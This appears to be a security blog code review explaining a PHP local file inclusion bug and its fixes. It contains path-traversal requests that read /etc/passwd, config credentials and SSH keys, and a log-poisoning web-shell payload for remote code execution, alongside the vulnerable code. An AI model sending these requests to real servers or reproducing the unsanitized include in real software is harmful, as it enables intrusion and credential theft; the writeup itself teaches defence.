← Back to all writeups

Code Review: Local File Inclusion via Unsanitized User Input

A PHP file inclusion pattern with zero input validation allowed an attacker to read arbitrary files from the server filesystem — including sensitive configuration files and system credentials.

lfiphpfile-inclusioncode-reviewpath-traversal

Most LFI vulnerabilities don’t come from complex logic. They come from a single line of code where a developer trusted user input they never should have.

This one is a classic — a PHP application that dynamically loads page templates based on a URL parameter. Clean, maintainable code on the surface. A complete disaster underneath.


The Code

<?php

function loadPage($page) {
    $basePath = '/var/www/html/pages/';
    $file = $basePath . $page;
    
    if (file_exists($file)) {
        include($file);
    } else {
        echo "Page not found.";
    }
}

$page = $_GET['page'];
loadPage($page);

?>

Read it carefully. The vulnerability is right there in plain sight.


Breaking It Down

The intent is simple — load a page template based on a URL parameter:

https://target.com/index.php?page=home.php
https://target.com/index.php?page=contact.php
https://target.com/index.php?page=about.php

The developer assumed users would only ever pass valid page names. They built the happy path and never considered what an attacker would send instead.

Here’s the flow:

  1. $_GET['page'] takes the page parameter directly from the URL — no sanitization, no validation
  2. It gets concatenated directly onto $basePathno path normalization
  3. file_exists() checks if the resulting path exists — any valid path on the filesystem passes this check
  4. include() loads and executes the file — including files way outside the intended directory

The Vulnerability — Path Traversal + LFI

Because $page is never sanitized, an attacker can use ../ sequences to traverse up the directory tree and reach any file on the server.

Attack 1 — Read /etc/passwd:

GET /index.php?page=../../../../etc/passwd

The resolved path becomes:

/var/www/html/pages/../../../../etc/passwd
→ /etc/passwd

file_exists() returns true. include() reads and outputs the entire file.

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
...

Attack 2 — Read application config with database credentials:

GET /index.php?page=../config/database.php

Resolved path:

/var/www/html/pages/../config/database.php
→ /var/www/html/config/database.php

If database.php contains hardcoded credentials — and it usually does — the attacker now has the database username, password, and host.

Attack 3 — Read SSH private keys:

GET /index.php?page=../../../../home/deploy/.ssh/id_rsa

Private key exfiltrated. Game over.


Why file_exists() Doesn’t Help

A common misconception is that checking file_exists() before including provides some protection. It doesn’t.

file_exists() returns true for any file that exists on the filesystem — not just files in the intended directory. It’s a filesystem check, not a security control. All it does here is avoid a PHP warning. An attacker only needs to target files that actually exist, which is trivially easy.


Going Further — LFI to RCE

In certain conditions, LFI can be escalated to Remote Code Execution:

Log Poisoning — if the attacker can write to a log file (e.g. Apache access log via a crafted User-Agent header) and then include that log file through the LFI, any PHP code in the log gets executed:

GET /index.php HTTP/1.1
User-Agent: <?php system($_GET['cmd']); ?>

Then:

GET /index.php?page=../../../../var/log/apache2/access.log&cmd=id

The PHP code embedded in the log executes and returns command output. LFI just became RCE.


Root Cause

One line is responsible for everything:

$page = $_GET['page'];  // ← raw user input, zero validation

The developer made two assumptions that attackers invalidate immediately:

  1. Users will only pass filenames, not directory traversal sequences
  2. The base path prefix provides containment — it doesn’t

The Fix

Fix 1 — Whitelist allowed pages:

<?php

function loadPage($page) {
    // Define exactly which pages are allowed — nothing else
    $allowedPages = ['home', 'about', 'contact', 'services'];
    
    if (!in_array($page, $allowedPages, true)) {
        http_response_code(404);
        echo "Page not found.";
        return;
    }
    
    $basePath = '/var/www/html/pages/';
    $file = $basePath . $page . '.php';
    include($file);
}

$page = $_GET['page'] ?? 'home';
loadPage($page);

?>

Fix 2 — Resolve the real path and validate it stays within the base directory:

<?php

function loadPage($page) {
    $basePath = realpath('/var/www/html/pages/');
    $requestedPath = realpath($basePath . '/' . $page);
    
    // Ensure the resolved path starts with the base path
    if ($requestedPath === false || strpos($requestedPath, $basePath) !== 0) {
        http_response_code(403);
        echo "Access denied.";
        return;
    }
    
    include($requestedPath);
}

$page = $_GET['page'] ?? 'home';
loadPage($page);

?>

realpath() resolves all ../ sequences to their actual filesystem path. The strpos() check then confirms the resolved path still lives inside the intended base directory. If it doesn’t — request denied.

Apply both fixes together. The whitelist prevents unknown filenames. The realpath() check prevents traversal even if the whitelist is somehow bypassed.


Key Takeaways

  • Never pass user input directly to include(), require(), fopen(), or any filesystem function — always validate first
  • file_exists() is not a security control — it checks existence, not authorization
  • Whitelisting is always stronger than blacklisting — define what’s allowed, reject everything else
  • realpath() is your friend — it collapses traversal sequences before you validate the path
  • LFI is not just information disclosure — in the right conditions it escalates to full RCE via log poisoning or file upload chaining

Found this useful? More code reviews coming. Hit me up on X if you want to discuss.